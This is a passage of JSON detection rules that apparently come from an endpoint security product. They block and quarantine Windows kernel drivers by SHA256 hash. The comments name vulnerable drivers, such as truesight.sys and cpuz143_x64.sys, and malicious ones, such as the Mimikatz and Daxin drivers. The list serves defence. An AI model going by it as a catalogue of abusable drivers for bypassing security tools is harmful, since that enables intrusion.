"2026-03-23T11:45:31.147172Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e95946ab82b3992a3f89a25e6e67f08ab2d086e7ba6f2d8efff2cca76b96f407", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3b61727e-27a8-5ece-995c-622986c6c3d8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605174Z", + "creation_date": "2026-03-23T11:45:29.605176Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605181Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "08b1b690730707fe4c04d4a8e05e229a58ef2bb7cdf8930c6a34c7ea4983c93d", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3b6a026c-042e-5646-8575-29a40078c2cf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610048Z", + "creation_date": "2026-03-23T11:45:29.610050Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610056Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "19696fb0db3fcae22f705ae1eb1e9f1151c823f3ff5d8857e90f2a4a6fdc5758", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", 
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3b6b5d42-047f-5701-b816-ea56808153fc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809099Z", + "creation_date": "2026-03-23T11:45:31.809101Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809107Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "71146bcb72abe1519c249a997e237b81a5e1114cd11d597be288f1fb14ec8950", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3b6e38a6-8668-5363-babd-bb8e724d9d9c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983884Z", + "creation_date": "2026-03-23T11:45:29.983886Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": 
true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983892Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3d23bdbaf9905259d858df5bf991eb23d2dc9f4ecda7f9f77839691acef1b8c4", + "comment": "Vulnerable Kernel Driver (aka iomem64.sys) [https://www.loldrivers.io/drivers/04d377f9-36e0-42a4-8d47-62232163dc68/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3b754c0f-746d-5bd0-bd45-bb46522bdf02", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970332Z", + "creation_date": "2026-03-23T11:45:29.970334Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970339Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bee3d0ac0967389571ea8e3a8c0502306b3dbf009e8155f00a2829417ac079fc", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3b77122e-246c-50c3-a517-abe3cadb9fdb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808558Z", + "creation_date": "2026-03-23T11:45:31.808560Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808566Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "76346678c5d72ce03497bcf4fb35e4c1f64edd453fd755e4b6adda69198ea4f6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3b7aa0b2-2dd3-593e-9f68-fd7581590704", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148260Z", + "creation_date": "2026-03-23T11:45:31.148261Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148267Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"a77532f83971f8d0a982331e4b1d2529e736e52700f99ef646004271ea086217", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3b82d260-d3c2-5d88-8e45-95e63c8de79b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812703Z", + "creation_date": "2026-03-23T11:45:31.812706Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812714Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0a023cdcc0d263f711310ee1161bc05a04b596fcb5915939a684fdc9e20139b3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3b8aff84-1923-526d-935c-de85a5980537", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828084Z", + "creation_date": "2026-03-23T11:45:30.828086Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828091Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "810ab8565dfc1d44151ae8c878be0944abf706877e31f51a12695c06efbec4b9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3b901092-727a-5aa7-9c74-f99c9457aa56", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.476052Z", + "creation_date": "2026-03-23T11:45:31.476056Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.476065Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f50b81473c5bf95988b4c8a0e8eabd83648384dc96180ba197e3e18f3aac0a5d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3b9ad25c-ae7a-5038-9c69-63260519fe4c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609962Z", + "creation_date": "2026-03-23T11:45:29.609965Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.609970Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a363deaf1790e9c0610e07a7203749aab8b60f5ededc944abc0ef3010f5e2105", + "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3b9ce25a-9dee-5045-8775-d8a47dc50ae8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827176Z", + 
"creation_date": "2026-03-23T11:45:31.827178Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827183Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "781b7d5905d14e413214d0d72734441fca5fd3cf906a1403d231359024ecc296", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3ba27702-bd96-563a-ae42-6ae696246e7d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.461810Z", + "creation_date": "2026-03-23T11:45:30.461813Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.461822Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3033ff03e6f523726638b43d954bc666cdd26483fa5abcf98307952ff88f80ee", + "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"3babf603-8f45-5ea9-b206-a36f01fd7707", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605504Z", + "creation_date": "2026-03-23T11:45:29.605506Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605512Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f3576ebbab0429cb0b7624836821f5f062c60cdda80432768544f0ff9ee79b55", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3bd2bf60-daab-5ab9-8247-225b5b1292fd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.472836Z", + "creation_date": "2026-03-23T11:45:31.472839Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.472849Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fe3320bb661b71a041cf0d6964db8cdc0d1210a0a6a21012a979a208a6715b30", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3bd7085a-822c-552d-9135-80c21909757f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819691Z", + "creation_date": "2026-03-23T11:45:30.819693Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819698Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4d777a9e2c61e8b55b3c34c5265b301454bb080abe7ffb373e7800bd6a498f8d", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3bdd31a0-2846-5813-b231-88d99bbf0a7f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480732Z", + "creation_date": "2026-03-23T11:45:30.480734Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480740Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bfc121e93fcbf9bd42736cfe7675ae2cc805be9a58f1a0d8cc3aa5b42e49a13f", + "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3be063c8-46d0-5abc-9e05-a6280ed5ce7e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.461668Z", + "creation_date": "2026-03-23T11:45:30.461671Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.461680Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"208ea38734979aa2c86332eba1ea5269999227077ff110ac0a0d411073165f85", + "comment": "Vulnerable Kernel Driver (aka titidrv.sys) [https://www.loldrivers.io/drivers/705facba-b595-41dd-86a6-93aefe6a6234/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3bea576f-f35e-50f0-855d-269ca19841fc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492757Z", + "creation_date": "2026-03-23T11:45:31.492761Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492769Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2c0d7ab7cf7d60bc75e37ad417daca7ab8c4916485270b13d5cea7e1fd953b2f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3bf26f1a-62bd-5c90-a0e8-7f730b22fe47", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" 
+ }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.470814Z", + "creation_date": "2026-03-23T11:45:30.470817Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.470826Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fcad50a13dcf1eeefffe2c2f51a052fd13bfaeddb0bd1f3c2353c64284ea62e2", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3bfd60ed-6600-5aeb-9620-d6b92e26a5dd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985832Z", + "creation_date": "2026-03-23T11:45:29.985834Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985839Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "16a1977a9251d6d4bec86bb0702a97bcaefa94444bbfe3978af2f79ee10d62a6", + "comment": "Malicious Kernel Driver (aka NQrmq.sys) [https://www.virustotal.com/gui/file/ad938d15ecfd70083c474e1642a88b078c3cea02cdbddf66d4fb1c01b9b29d9a] [authentihash SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3bfdc963-0463-50ad-821d-b7a6c4799a86", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982555Z", + "creation_date": "2026-03-23T11:45:29.982557Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982563Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "389d04a947be32b43eab5767f548fc193e9ac5fe5225a3b6dc26ddc80c326d7d", + "comment": "Malicious Kernel Driver (aka daxin_blank1.sys) [https://www.loldrivers.io/drivers/1bf3b155-752a-4cc7-beb0-f202e525eb1a/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3c02528b-4c5b-5c33-b0fb-66739f908bf3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155596Z", + "creation_date": "2026-03-23T11:45:31.155599Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.155604Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a3bdfd308d29f5f5c07035701a30d4120b69c7ae4003ca179a41e69d9e6b961c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3c025e53-97ec-5444-a1a0-5835d910d984", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981367Z", + "creation_date": "2026-03-23T11:45:29.981369Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981374Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "854bc946b557ed78c7d40547eb39e293e83942a693c94d0e798d1c4fbde7efa9", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3c04061b-eed1-51ed-99ed-fa4a4dfef853", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
